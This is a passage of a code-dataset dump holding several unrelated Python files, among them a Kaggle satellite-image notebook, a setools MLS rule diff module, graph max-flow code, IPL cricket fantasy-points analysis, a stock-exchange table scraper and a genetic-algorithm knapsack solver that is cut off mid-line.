last\n\t\tpointer += 1\n\ndef mergesort(A, p, r):\n\tif p < r:\n\t\tmid = (p+r-1) // 2\n\t\tmergesort(A, p, mid)\n\t\tmergesort(A, mid+1, 
r)\n\t\tmerge(A, p, q, r)\n","repo_name":"hookeyplayer/exercise.io","sub_path":"算法/笔记03_归并排序.py","file_name":"笔记03_归并排序.py","file_ext":"py","file_size_in_byte":932,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"22"} +{"seq_id":"72956235895","text":"#!/usr/bin/env python\n# coding: utf-8\n\n\n\nimport sys\nimport os\nimport subprocess\nfrom six import string_types\nimport numpy as np\nimport pandas as pd\nimport seaborn as sns\nimport matplotlib.pyplot as plt\nimport matplotlib.image as mpimg\nimport scipy\nfrom skimage import io\nfrom scipy import ndimage\nfrom IPython.display import display\nget_ipython().run_line_magic('matplotlib', 'inline')\nfrom spectral import imshow\n\n\n\n\nget_ipython().system('ls -lha ../input')\n\n\n\n\nget_ipython().system('ls -lha ../input/test-tif-v2 | wc -l')\n\n\n\n\nPLANET_KAGGLE_ROOT = os.path.abspath(\"../input/\")\nPLANET_KAGGLE_JPEG_DIR = os.path.join(PLANET_KAGGLE_ROOT, 'train-jpg')\nPLANET_KAGGLE_LABEL_CSV = os.path.join(PLANET_KAGGLE_ROOT, 'train_v2.csv')\nassert os.path.exists(PLANET_KAGGLE_ROOT)\nassert os.path.exists(PLANET_KAGGLE_JPEG_DIR)\nassert os.path.exists(PLANET_KAGGLE_LABEL_CSV)\n\n\n\n\nlabels_df = pd.read_csv(PLANET_KAGGLE_LABEL_CSV)\nlabels_df.head()\n\n\n\n\n# Build list with unique labels\nlabel_list = []\nfor tag_str in labels_df.tags.values:\n labels = tag_str.split(' ')\n for label in labels:\n if label not in label_list:\n label_list.append(label)\n\n\n\n\n# Add onehot features for every label\nfor label in label_list:\n labels_df[label] = labels_df['tags'].apply(lambda x: 1 if label in x.split(' ') else 0)\n# Display head\nlabels_df.head()\n\n\n\n\n# Histogram of label instances\nlabels_df[label_list].sum().sort_values().plot.bar()\n\n\n\n\ndef make_cooccurence_matrix(labels):\n numeric_df = labels_df[labels]; \n c_matrix = numeric_df.T.dot(numeric_df)\n sns.heatmap(c_matrix)\n return c_matrix\n\n# Compute the co-ocurrence matrix\nmake_cooccurence_matrix(label_list)\n\n\n\n\nweather_labels = ['clear', 'partly_cloudy', 'haze', 'cloudy']\nmake_cooccurence_matrix(weather_labels)\n\n\n\n\nland_labels = ['primary', 'agriculture', 'water', 'cultivation', 'habitation']\nmake_cooccurence_matrix(land_labels)\n\n\n\n\nrare_labels = [l for l in label_list if labels_df[label_list].sum()[l] < 2000]\nmake_cooccurence_matrix(rare_labels)\n\n\n\n\ndef sample_images(tags, n=None):\n \"\"\"Randomly sample n images with the specified tags.\"\"\"\n condition = True\n if isinstance(tags, string_types):\n raise ValueError(\"Pass a list of tags, not a single tag.\")\n for lbl in label_list:\n if lbl in tags:\n condition = condition & (labels_df[lbl] == 1)\n else:\n condition = condition & (labels_df[lbl] == 0)\n if n is not None:\n return labels_df[condition].sample(n)\n else:\n return labels_df[condition]\n\n\n\n\nsample_images(['clear','primary'], n=10)\n\n\n\n\ndef load_image(filename):\n '''Look through the directory tree to find the image you specified\n (e.g. train_10.tif vs. 
train_10.jpg)'''\n for dirname in os.listdir(PLANET_KAGGLE_ROOT):\n path = os.path.abspath(os.path.join(PLANET_KAGGLE_ROOT, dirname, filename))\n if os.path.exists(path):\n #print('Found image {}'.format(path))\n return io.imread(path)\n # if you reach this line, you didn't find the image you're looking for\n print('Load failed: could not find image {}'.format(path))\n \ndef sample_to_fname(sample_df, row_idx, suffix='tif'):\n '''Given a dataframe of sampled images, get the\n corresponding filename.'''\n fname = sample_df.get_value(sample_df.index[row_idx], 'image_name')\n return '{}.{}'.format(fname, suffix)\n\ndef display_sample_im(tags, n=None):\n s = sample_images(tags, n=n)\n if n is None:\n n=0\n for i in range(n):\n fname = sample_to_fname(s.iloc[i], 0)\n rgbn_image = load_image(fname)\n imshow(rgbn_image[:,:,:3])\n return rgbn_image, s\n \n \n\n\n\n\nim, s = display_sample_im(['primary', 'clear'], n=4);\ns\n\n\n\n\nim_m = np.vstack([im[i*16:(i+1)*16,j*16:(j+1)*16,0].ravel() for i in range(16) for j in range(16)])\ncov = np.cov(im_m)\neigen_value, eigen_vector = np.linalg.eig(cov)\neigen_value = eigen_value.reshape(-1,1)\nsignificance_ind = eigen_value.argsort(axis=0)[::-1]\neigen_value[significance_ind[:,0]]\n# The n_th eigen vector\nn = 0\ni = significance_ind[n,0]\nfeature = eigen_vector[:,i:i+1].T\nfinaldata = np.dot(feature,im_m).T\nfirst_eigen_image = np.dot(feature.T,finaldata.T).T\nplt.imshow(im[0:16,0:16,0]);\nplt.figure()\nplt.imshow(finaldata.reshape(16,16));\nplt.figure()\nplt.imshow(first_eigen_image)\n\n\n\n\ndef calibrate_image(rgb_image):\n ref_stds = [41.262260630543992, 35.759466445746916, 33.383302346657047]\n ref_means = [80.198569793701168, 87.701977996826173, 76.552578582763672]\n \n # Transform test image to 32-bit floats to avoid \n # surprises when doing arithmetic with it \n calibrated_img = rgb_image.copy().astype('float32')\n\n # Loop over RGB\n for i in range(3):\n # Subtract mean \n calibrated_img[:,:,i] = calibrated_img[:,:,i]-np.mean(calibrated_img[:,:,i])\n # Normalize variance\n calibrated_img[:,:,i] = calibrated_img[:,:,i]/np.std(calibrated_img[:,:,i])\n # Scale to reference \n calibrated_img[:,:,i] = calibrated_img[:,:,i]*ref_stds[i] + ref_means[i]\n # Clip any values going out of the valid range\n calibrated_img[:,:,i] = np.clip(calibrated_img[:,:,i],0,255)\n\n # Convert to 8-bit unsigned int\n return calibrated_img.astype('uint8')\n\n\n\n\n\n\n","repo_name":"aorursy/lost-nb","sub_path":"bastiaanbergman_getting-started-with-the-data.py","file_name":"bastiaanbergman_getting-started-with-the-data.py","file_ext":"py","file_size_in_byte":5226,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"22"} +{"seq_id":"2616794660","text":"from collections import defaultdict, namedtuple\n\nfrom ..policyrep import MLSRuletype\nfrom .descriptors import DiffResultDescriptor\nfrom .difference import Difference, SymbolWrapper, Wrapper\nfrom .mls import RangeWrapper\n\n\nmodified_mlsrule_record = namedtuple(\"modified_mlsrule\", [\"rule\",\n \"added_default\",\n \"removed_default\"])\n\n\nclass MLSRulesDifference(Difference):\n\n \"\"\"Determine the difference in MLS rules between two policies.\"\"\"\n\n added_range_transitions = DiffResultDescriptor(\"diff_range_transitions\")\n removed_range_transitions = DiffResultDescriptor(\"diff_range_transitions\")\n modified_range_transitions = DiffResultDescriptor(\"diff_range_transitions\")\n\n # Lists of rules for each policy\n _left_mls_rules = defaultdict(list)\n 
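[Editor's note] The eigen-decomposition block in the preceding Kaggle record projects flattened 16x16 image tiles onto the leading eigenvector of their covariance and reconstructs a rank-1 image. A self-contained sketch of the same idea on random stand-in data; np.linalg.eigh is used here instead of eig since the covariance matrix is symmetric, which avoids spurious complex parts:

```python
import numpy as np

rng = np.random.default_rng(0)
im_m = rng.random((256, 256))            # 256 tiles x 256 pixels, stand-in data

cov = np.cov(im_m)                       # (256, 256) covariance across tiles
eigen_value, eigen_vector = np.linalg.eigh(cov)  # eigenvalues in ascending order
feature = eigen_vector[:, -1:].T         # (1, 256) leading eigenvector

scores = feature @ im_m                  # projection of every observation, (1, 256)
rank1 = feature.T @ scores               # rank-1 reconstruction, (256, 256)
print(rank1.shape)
```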
_right_mls_rules = defaultdict(list)\n\n def diff_range_transitions(self):\n \"\"\"Generate the difference in range_transition rules between the policies.\"\"\"\n\n self.log.info(\n \"Generating range_transition differences from {0.left_policy} to {0.right_policy}\".\n format(self))\n\n if not self._left_mls_rules or not self._right_mls_rules:\n self._create_mls_rule_lists()\n\n added, removed, matched = self._set_diff(\n self._expand_generator(self._left_mls_rules[MLSRuletype.range_transition],\n MLSRuleWrapper),\n self._expand_generator(self._right_mls_rules[MLSRuletype.range_transition],\n MLSRuleWrapper))\n\n modified = []\n\n for left_rule, right_rule in matched:\n # Criteria for modified rules\n # 1. change to default range\n if RangeWrapper(left_rule.default) != RangeWrapper(right_rule.default):\n modified.append(modified_mlsrule_record(left_rule,\n right_rule.default,\n left_rule.default))\n\n self.added_range_transitions = added\n self.removed_range_transitions = removed\n self.modified_range_transitions = modified\n\n #\n # Internal functions\n #\n def _create_mls_rule_lists(self):\n \"\"\"Create rule lists for both policies.\"\"\"\n # do not expand yet, to keep memory\n # use down as long as possible\n self.log.debug(\"Building MLS rule lists from {0.left_policy}\".format(self))\n for rule in self.left_policy.mlsrules():\n self._left_mls_rules[rule.ruletype].append(rule)\n\n self.log.debug(\"Building MLS rule lists from {0.right_policy}\".format(self))\n for rule in self.right_policy.mlsrules():\n self._right_mls_rules[rule.ruletype].append(rule)\n\n self.log.debug(\"Completed building MLS rule lists.\")\n\n def _reset_diff(self):\n \"\"\"Reset diff results on policy changes.\"\"\"\n self.log.debug(\"Resetting MLS rule differences\")\n self.added_range_transitions = None\n self.removed_range_transitions = None\n self.modified_range_transitions = None\n\n # Sets of rules for each policy\n self._left_mls_rules.clear()\n self._right_mls_rules.clear()\n\n\nclass MLSRuleWrapper(Wrapper):\n\n \"\"\"Wrap MLS rules to allow set operations.\"\"\"\n\n __slots__ = (\"ruletype\", \"source\", \"target\", \"tclass\")\n\n def __init__(self, rule):\n self.origin = rule\n self.ruletype = rule.ruletype\n self.source = SymbolWrapper(rule.source)\n self.target = SymbolWrapper(rule.target)\n self.tclass = SymbolWrapper(rule.tclass)\n self.key = hash(rule)\n\n def __hash__(self):\n return self.key\n\n def __lt__(self, other):\n return self.key < other.key\n\n def __eq__(self, other):\n # because MLSRuleDifference groups rules by ruletype,\n # the ruletype always matches.\n return self.source == other.source and \\\n self.target == other.target and \\\n self.tclass == other.tclass\n","repo_name":"TresysTechnology/setools","sub_path":"setools/diff/mlsrules.py","file_name":"mlsrules.py","file_ext":"py","file_size_in_byte":4094,"program_lang":"python","lang":"en","doc_type":"code","stars":90,"dataset":"github-code","pt":"22"} +{"seq_id":"28164529050","text":"def read_file(file_name: str, what=None) -> dict:\n res = {}\n with open(file_name) as fp:\n for line in fp:\n split = line.split(\";\")\n if split[0] == \"id\":\n continue\n if what == None:\n res[int(split[0])] = [int(nb) for nb in split[1:]]\n elif what == \"students\":\n res[int(split[0])] = split[1] + \" \" + split[2].strip()\n return res\n\n\ndef get_final_grade(points: int) -> int:\n values = [14, 17, 20, 23, 27]\n for i in range(5):\n if points <= values[i]:\n return i\n return 5\n\n\nstudent_file = input(\"Student information: 
\")\nexercises_file = input(\"Exercises completed: \")\nexam_file = input(\"Exam points: \")\ncourse_file = input(\"Course information: \")\nwith open(\"course1.txt\") as course_file:\n course = course_file.readline().split(\":\")[1].strip()\n print(course)\n credits = int(course_file.readline().split(\":\")[1])\nwith open(\"results.txt\", \"w\") as res_txt, open(\"results.csv\", \"w\") as res_csv:\n header = f\"{course}, {credits} credits\"\n res_txt.write(f\"{header}\\n{'=' * len(header)}\\n\")\n headers = [\"name\", \"exec_nbr\", \"exec_pts.\",\n \"exm_pts.\", \"tot_pts.\", \"grade\"]\n res_txt.write(f\"{headers[0]:30}\")\n res_txt.write(\"\".join(f\"{header:10}\" for header in headers[1:]))\n for id, name in read_file(student_file, \"students\").items():\n exerc = sum(read_file(exercises_file)[id])\n exams = sum(read_file(exam_file)[id])\n res_txt.write(f\"\\n{name:30}{exerc:<10}{exerc//4:<10}{exams:<10}\"\n f\"{exerc//4 + exams:<10}\"\n f\"{get_final_grade(exerc//4 + exams):<10}\")\n res_csv.write(f\"{id};{name};{get_final_grade(exerc//4 + exams)}\\n\")\nprint(\"Results written to files results.txt and results.csv\")\n","repo_name":"P10r10/Python-Programming-Week-6","sub_path":"course_grading_part_4.py","file_name":"course_grading_part_4.py","file_ext":"py","file_size_in_byte":1813,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"22"} +{"seq_id":"17707148759","text":"# 조건\n\"\"\"\n1. 프로그램 실행 시간을 1/1000초 단위로 계산하기 # ms로 계산하라는 의미\n2. datetime 모듈을 사용하기\n3. datetime 모듈의 datetime 객체를 임포트하여 사용하기\n4. ret 변수에 1부터 백만까지 더한 결과를 담을 변수로 사용한다.\n5. 1부터 백만까지의 더하는 루틴은 for 문을 사용한다.\n6. 1에서부터 백만까지 더한 결과를 화면에 print를 통해 출력한다.\n7. 결과\n 1부터 백만까지 더합니다.\n 1부터 백만까지 더한 결과 : 499999500000 # 백만까지 더한게 아니라 99만9999까지 더한 값\n 총 계산 시간 : 0:00:00.124968\n 총 계산 시간 : 124ms\n\"\"\"\n\nfrom datetime import datetime\n\nret = 0\n\nfor i in range(1,1000000) :\n if i == 1 :\n print(\"1부터 백만까지 더합니다.\")\n start = datetime.now()\n ret += i\n if i == 999999 :\n end = datetime.now() - start\n print(\"1부터 백만까지 더한 결과 : {}\".format(ret))\n print(\"총 계산 시간 : {}\".format(end))\n print(\"총 계산 시간 : {}ms\".format(round(end.microseconds*0.001)))","repo_name":"GyuminGomin/Python-study","sub_path":"01.Python program coding/01~10/03.1부터 백만까지 더하는 프로그램 실행 시간 계산하기.py","file_name":"03.1부터 백만까지 더하는 프로그램 실행 시간 계산하기.py","file_ext":"py","file_size_in_byte":1137,"program_lang":"python","lang":"ko","doc_type":"code","stars":0,"dataset":"github-code","pt":"22"} +{"seq_id":"2979998463","text":"file = open(\"Day10.txt\")\n\ndata = []\nfor line in file:\n val = int(line[:-1])\n data.append(val)\n\ndata.sort()\ndata.append(max(data)+3)\n\nlast = 0\n_1count = 0\n_3count = 0\nfor d in data:\n if (d - last == 1): _1count += 1\n elif (d - last == 3): _3count += 1\n else: print (\"!!!\")\n last = d\n\nprint (f\"1-diff: {_1count}\")\nprint (f\"3-diff: {_3count}\")\nprint (_3count * _1count)\n","repo_name":"RexTremendae/AdventOfCode","sub_path":"archive/Source/2020/Day10_1.py","file_name":"Day10_1.py","file_ext":"py","file_size_in_byte":385,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"22"} +{"seq_id":"999058336","text":"'''A collection of graph algorithms\n\nCurrently assumes directed graphs.\n'''\n\nfrom collections import deque\n\ndef floyd_warshall(graph):\n '''All-pairs shortest paths\n '''\n pass\n\ndef bfs(graph, source, sink):\n '''Return a list of edges from source to sink, or None.\n \n Requires\n graph.children\n edge labels\n '''\n queue = deque([source])\n prevs = 
{source: None}\n\n while queue:\n cur = queue.popleft()\n if cur == sink:\n break\n for b in graph.children(cur):\n if b not in prevs:\n prevs[b] = cur\n queue.append(b)\n else:\n return None\n\n path, here = [], sink\n while here != source:\n path.append((prevs[here], here))\n here = prevs[here]\n return list(reversed(path))\n\n\ndef max_flow(graph, source, sink):\n '''Max flow of digraph\n \n Requires\n digraph.copy\n digraph.children\n edge labels\n '''\n resid = graph.copy()\n total_flow = 0\n\n while True:\n path = bfs(resid, source, sink)\n if path is None:\n break\n\n flow = min(resid[a:b] for a, b in path)\n\n for a, b in path:\n if (b, a) not in resid.edges():\n resid[b:a] = 0\n resid[a:b] -= flow\n resid[b:a] += flow\n if resid[a:b] == 0:\n resid.pop_edge(a, b)\n\n total_flow += flow\n\n return total_flow\n\n","repo_name":"apribadi/practicum","sub_path":"feeding/sgraph/algorithm.py","file_name":"algorithm.py","file_ext":"py","file_size_in_byte":1438,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"22"} +{"seq_id":"28457292599","text":"# will later add player roles to get much deeper insights\n\nimport os\nos.chdir(r'C:\\\\Users\\\\santosh\\\\PycharmProjects\\\\Cricket')\n\nimport numpy as np\nimport pandas as pd\npd.set_option('display.max_columns',40)\npd.set_option('display.max_rows',1000)\n\nmatches = pd.read_csv('IPL_matches.csv')\ndeliveries_including_superovers = pd.read_csv('IPL_deliveries.csv')\n\ndeliveries = deliveries_including_superovers[(deliveries_including_superovers['innings'] == '1st innings') | (deliveries_including_superovers['innings'] == '2nd innings')]\nmd = matches.merge(deliveries)\n\nbatsmanscores = md.groupby(['season', 'match_id', 'striker'], sort=False).agg(np.sum)\nbatsmanscores = batsmanscores[['batsman_runs']]\nbatsmanscores.reset_index(inplace=True)\nbatsmanscores.rename(columns={'striker': 'player'}, inplace=True)\n\nbowlerprep = md[(md['kind_of_dismissal'] != 'run out') & (md['kind_of_dismissal'] != 'retired hurt') & (md['kind_of_dismissal'] != 'obstructing the field')]\nbowlerscores = bowlerprep.groupby(['season', 'match_id', 'bowler'], sort=False).agg(np.sum)\nbowlerscores = bowlerscores[['wicket']]\nbowlerscores.reset_index(inplace=True)\nbowlerscores.rename(columns={'bowler': 'player'}, inplace=True)\n\nfielderprep = md.copy()\n#\"Caught and bowled\" wicket deliveries have fielder column empty which must have the value of bowler himself\nfielderprep['fielders'] = np.where(fielderprep['kind_of_dismissal']=='caught and bowled', fielderprep['bowler'], fielderprep['fielders'])\n\nfielderprep = fielderprep.groupby(['season', 'match_id', 'bowler', 'kind_of_dismissal', 'fielders']).agg(np.sum)\nfielderprep.reset_index(inplace =True)\nfielderprep = fielderprep.drop(['win_by_runs', 'win_by_wickets', 'delivery', 'wides', 'legbyes',\n 'noballs', 'byes', 'penalty', 'non_boundary', 'batsman_runs',\n 'extra_runs', 'total_runs', 'wicket'], axis=1)\nfielderprep['fielders'] = fielderprep['fielders'].str.replace('[','').str.replace(']','').str.replace(\"'\",\"\")\n\nfielderprep.drop('bowler', axis =1, inplace = True)\nfielderprep.rename(columns={'fielders':'player'}, inplace=True)\n\n# There are no points for substitutes, let's remove those rows.\nfor i, j in zip(fielderprep.index, fielderprep['player']):\n if '(sub)' in j:\n fielderprep.drop(i, inplace=True)\n\n fielderprep['fielding_points'] = np.where(fielderprep['kind_of_dismissal']=='caught', 8, 0)\nfielderprep['fielding_points'] = 
np.where(fielderprep['kind_of_dismissal']=='caught and bowled', 8, fielderprep['fielding_points'])\nfielderprep['fielding_points'] = np.where(fielderprep['kind_of_dismissal']=='stumped', 12, fielderprep['fielding_points'])\n\n# assigning points for direct hits\ncondition = (fielderprep['kind_of_dismissal']=='run out') & (fielderprep['player'].str.split(',').str.len()==1)\nfielderprep['fielding_points'] = np.where(condition, 12, fielderprep['fielding_points'])\n\n# assigning points for non-direct hits\nfielderprep = fielderprep.assign(player=fielderprep['player'].str.split(',')).explode('player')\nfielderprep['fielding_points'] = np.where(fielderprep['fielding_points']==0,6,fielderprep['fielding_points'])\nfieldingscores = fielderprep.groupby(['season', 'match_id', 'player']).agg(np.sum).reset_index()\nfieldingscores['player'] = fieldingscores['player'].str.strip()\nmatchteam_bb = batsmanscores.merge(bowlerscores, left_on=['season', 'match_id', 'player'], right_on=['season', 'match_id', 'player'], how='outer')\n\nmatchteam_bb.rename(columns={'batsman_runs': 'player_runs', 'wicket': 'player_wickets'}, inplace=True)\nmatchteam_bb.fillna(0, inplace=True)\nmatchteam = matchteam_bb.merge(fieldingscores, left_on=['season', 'match_id', 'player'], right_on=['season', 'match_id', 'player'], how='outer')\nmatchteam.fillna(0, inplace=True)\n\n# making points columns\nmatchteam['runs_points'] = np.where((matchteam['player_runs'] >= 50) & (matchteam['player_runs'] < 100), matchteam['player_runs']+8, matchteam['player_runs'])\nmatchteam['runs_points'] = np.where(matchteam['player_runs'] >= 100, matchteam['player_runs']+16, matchteam['runs_points'])\nmatchteam['runs_points'] = np.where(matchteam['player_runs'] == 0, -2, matchteam['runs_points'])\n\nmatchteam['bowling_points'] = np.where(matchteam['player_wickets'] >= 4, (matchteam['player_wickets']*25)+16, matchteam['player_wickets']*25)\n\nmatchteam['total_points'] = matchteam['runs_points'] + matchteam['bowling_points'] + matchteam['fielding_points']\n\n# dreamteams for matches\nseason_list = []\nmatch_num = []\nplayer_name = []\nrun_points = []\nbowl_points = []\nfield_points = []\nplayer_points = []\n\n# I tried sorting, that messes up the grouped matches, so now we take in each match and then sort.\n# Then we append top 11 players and their points to lists.\n\nfor i in matchteam['match_id'].unique():\n tempdf = matchteam[matchteam['match_id'] == i]\n topelevendf = tempdf.nlargest(11, 'total_points')\n for j in list(topelevendf['match_id']):\n match_num.append(j)\n for k in list(topelevendf['player']):\n player_name.append(k)\n for l in list(topelevendf['total_points']):\n player_points.append(l)\n for m in list(topelevendf['season']):\n season_list.append(m)\n for n in list(topelevendf['runs_points']):\n run_points.append(n)\n for o in list(topelevendf['bowling_points']):\n bowl_points.append(o)\n for p in list(topelevendf['fielding_points']):\n field_points.append(p)\ndreamteamdf = pd.DataFrame({'season': season_list, 'match_id': match_num, 'player': player_name,\n 'runs_points': run_points,'bowling_points': bowl_points, 'fielding_points': field_points,\n 'total_points': player_points})\n\n# using IPL_Players dataset to add a column of DOB for matchteam\nos.chdir(r'C:\\\\Users\\\\santosh\\\\PycharmProjects\\\\Cricket')\nipl_players = pd.read_csv('IPL_Players.csv')\nipl_players.drop(['Age', 'Teams', 'Matches', 'Runs', 'Bat avg', 'Wickets',\n 'Bowl avg', 'PlayerID'], axis=1, inplace=True)\nipl_players.rename(columns={'Name': 'player'}, 
inplace=True)\nipl_players['DOB'] = pd.to_datetime(ipl_players['DOB'])\n\nmatchteammergedf = matchteam.merge(ipl_players, how='outer', left_on='player', right_on='player')\nmatchteammergedf = matchteammergedf.loc[0:17650, :] # removing a few NA rows at the bottom arising out of merging\nmatchteammergedf['season'] = pd.to_datetime(matchteammergedf['season'], format='%Y')\nmatchteammergedf['matchday_player_age'] = (matchteammergedf['season'] - matchteammergedf['DOB']).astype('<m8[Y]')\n# Just accomplished a cool thing, we have age as on match day for all players for all matches\n\n# using IPL_Players dataset to add a column of DOB for dreamteamdf too\n\ndreamteamdfmerge = dreamteamdf.merge(ipl_players, how='inner')\ndreamteamdfmerge['season'] = pd.to_datetime(dreamteamdfmerge['season'], format='%Y')\ndreamteamdfmerge['matchday_player_age'] = (dreamteamdfmerge['season'] - dreamteamdfmerge['DOB']).astype('<m8[Y]')\n\nos.chdir(r'C:\\\\Users\\\\santosh\\\\PycharmProjects\\\\Cricket')\nmatchteammergedf.to_csv('IPL_matchwise_player_points.csv', index=False)\n\nos.chdir(r'C:\\\\Users\\\\santosh\\\\PycharmProjects\\\\Cricket')\ndreamteamdfmerge.to_csv('IPL_historical_dreamteams.csv', index=False)\n","repo_name":"santosh7a/cricketviz","sub_path":"IPL_HistoricalDreamTeams.py","file_name":"IPL_HistoricalDreamTeams.py","file_ext":"py","file_size_in_byte":7172,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"22"} +{"seq_id":"29099495135","text":"\r\n\r\n# This is a program to predict the stock price in the ugandan stock market\r\nimport csv\r\nimport requests\r\nfrom bs4 import BeautifulSoup\r\nfrom csv import writer\r\nimport time\r\n# Getting data from Uganda Securities Exchange\r\nurl='https://www.use.or.ug/content/market-snapshot'\r\nresponse = requests.get(url)\r\nsoup = BeautifulSoup(response.text,'html.parser')\r\n\r\n# Assigning a name to the data\r\nfilename ='use data.csv'\r\ncsv_writer = csv.writer(open(filename,'w'))\r\n\r\n# Making sure that the file gets updated by using time as a constraint\r\ntimestr1 = time.strftime(\"%Y%m%d-%H%M%S\")\r\nchanged_filename = filename.split(\".\")[0]+timestr1+\".\"+filename.split(\".\")[1]\r\nprint(changed_filename)\r\n\r\n# Getting the data from the table in the U.S.E site ie. 
Market snapshot\r\nfor tr in soup.find_all('tr'):\r\n data =[]\r\n\r\n for th in tr.find_all('th'):\r\n data.append(th.text)\r\n\r\n if data:\r\n print(\"Inserting Headers:{}\".format(','.join(data)))\r\n csv_writer.writerow(data)\r\n continue\r\n\r\n for td in tr.find_all('td'):\r\n data.append(td.text.strip())\r\n\r\n if data:\r\n print(\"Inserting Table Data:{}\".format(','.join(data)))\r\n csv_writer.writerow(data)\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n","repo_name":"Namrod16127/E-broker_csvs","sub_path":"data_fetch.py","file_name":"data_fetch.py","file_ext":"py","file_size_in_byte":1295,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"22"} +{"seq_id":"7268423533","text":"import numpy as np\nimport time\nimport random\nimport matplotlib.pyplot as plt\nimport os\n\ndef read(data_file,i):\n \"\"\"\n 读取txt文件\n :param data_file:输入测试样例文件路径\n :param i:样例i\n :return: W:背包最大容量(int);N:物品数量(int);w:每件物品的重量(list);v:每件物品的价值(list)\n \"\"\"\n W = 0\n N = 0\n w = []\n v = []\n with open(data_file,'r') as f:\n string = f.readlines()\n for j in range(len(string)):\n if string[j] == '(' + str(i) + ')' + ' \\n':\n W = int(string[j+2].split(' ')[0])\n N = int(string[j+2].split(' ')[1])\n for k in range(1,N+1):\n w.append(int(string[j+k+2].split(' ')[0]))\n v.append(int(string[j+k+2].split(' ')[1]))\n return W, N, w, v\n\nclass MyGA(object):\n #类属性\n cross_p = 0.6\n variation_p = 0.2\n pop_num = 100 #种群内个体数目\n cross_num = int(pop_num/2) #交叉的对数\n #精英解参数\n elite_num = 4 #精英解池的个数\n elite_th = 0 #精英解池的最低门限\n elite_min_index = 0 #精英解池 最小价值精英解的索引\n #自适应参数\n avg_fitness = 0\n max_fitness = 0\n\n #类方法\n def __init__(self,W,N,w,v):\n \"\"\"\n 初始化类的函数\n :param W: 背包最大承重\n :param N: 物品总数\n :param w: 每件物品的重量\n :param v: 每件物品的价值\n \"\"\"\n self.bag_max_w = W\n self.N = N\n self.w = w\n self.v = v\n #迭代的代数采用十倍的物品数量\n self.generation = self.N*10\n #定义一个元组,便于表达数组大小\n self.shape =(self.pop_num,N)\n #初始化种群,0的概率为0.9,1的概率为0.1,防止重量过大适应度减少为0\n self.population = np.random.choice([0, 1], size=self.shape, p=[.9, .1])\n #初始化价值存储数组\n self.max_value_pre_gen = np.zeros(self.generation,dtype=np.int32)\n #初始化精英解池\n self.elite = np.zeros(shape=(self.elite_num,N),dtype=np.uint32)\n #初始化精英解池的价值\n self.elite_value = np.zeros(shape=self.elite_num,dtype=np.uint32)\n #记录每一轮精英解池的最大值\n self.max_value_elite = np.zeros(self.generation,dtype=np.int32)\n\n\n\n\n def fitnessF(self):\n \"\"\"\n 计算适应度的函数\n :param self.population :所有个体\n :param self.v :每件物品的价值\n :param self.w :每件物品的重量\n :param self.bag_max_w :背包最大承重\n :param self.value :当前每个个体背包内的价值\n :param self.fitness :当前每个个体的适应度\n \"\"\"\n #计算每个个体的价值\n self.value = np.dot(self.population,self.v)\n #计算每个个体的所带物品的重量\n self.weight = self.population.dot(self.w)\n self.fitness =self.value\n #大于背包最大值的个体适应度清零\n for i in range(self.pop_num):\n if(self.weight[i]>=self.bag_max_w):\n self.fitness[i] = 0\n #计算平均适应度\n self.avg_fitness = np.average(self.fitness)\n self.max_fitness = np.max(self.fitness)\n\n\n\n def select(self):\n \"\"\"\n 用轮盘赌的方法确定子代个体\n :param self.fitness :当前每个个体的适应度\n :param fitness_sum :所有适应度的总和\n :param cumulative_p :累计概率\n :param new_population :新选出来的子代\n 引入精英解来共同产生子代\n \"\"\"\n #总和归一化\n fitness_sum = np.sum(self.fitness)\n select_p = self.fitness/fitness_sum\n #计算累计概率\n cumulative_p = np.zeros(shape=(self.pop_num,1),dtype=np.float64)\n cumulative_p[0,0] = select_p[0]\n for i in 
range(1,self.pop_num):\n cumulative_p[i] = cumulative_p[i-1] + select_p[i]\n #生成新的子代\n new_population = np.zeros_like(self.population)\n\n #子代个体生成的顺序\n order = random.sample(range(self.pop_num),self.pop_num)\n From_parent = order[0:self.pop_num-self.elite_num]\n From_elite = order[self.pop_num-self.elite_num:]\n #从父代中生成子代\n for i in From_parent:\n #轮盘赌的方法\n rand_num = np.random.uniform()\n for j,cum_val in enumerate(cumulative_p):\n if(cum_val>rand_num):\n break\n new_population[i,:] = self.population[j,:]\n #从精英解池中获得子代\n for index,value in enumerate(From_elite):\n new_population[value,:] = self.elite[index,:]\n #更新群体\n self.population = new_population\n\n def cross(self):\n \"\"\"\n 进行交叉的函数\n 采用随机两个交叉位点 将中间段进行互换\n \"\"\"\n for i in range(self.cross_num):\n #先判断要不要进行交叉\n rand_num = np.random.uniform()\n if(rand_num>self.cross_p):\n continue\n #产生两个随机的位置\n cross_pos = np.sort(random.sample(range(0, self.N), 2))\n #中间两端互换\n section = self.population[2*i,cross_pos[0]:cross_pos[1]].copy()\n self.population[2*i,cross_pos[0]:cross_pos[1]] = self.population[2*i+1,cross_pos[0]:cross_pos[1]]\n self.population[2*i+1,cross_pos[0]:cross_pos[1]] = section\n\n def variation(self):\n '''\n 进行变异的函数\n 01翻转\n '''\n for i in range(self.pop_num):\n #先判断要不要进行变异\n rand_num = np.random.uniform()\n if(rand_num>self.variation_p):\n continue\n #变异也只变一位,避免搜索空间过大\n variation_pos = np.random.randint(self.N,dtype=np.uint8)\n self.population[i,variation_pos] = np.mod(self.population[i,variation_pos]+1,2)\n\n def record_best_individual(self,times):\n #保存最大价值\n self.max_value_pre_gen[times] = np.max(self.fitness)\n\n #保存精英解中最大值\n self.max_value_elite[times] = np.max(self.elite_value)\n\n\n def elite_renew(self):\n for i in range(self.pop_num):\n if(self.fitness[i]>self.elite_th):\n #更新精英解池和精英解价值\n self.elite[self.elite_min_index,:] = self.population[i,:]\n self.elite_value[self.elite_min_index] = 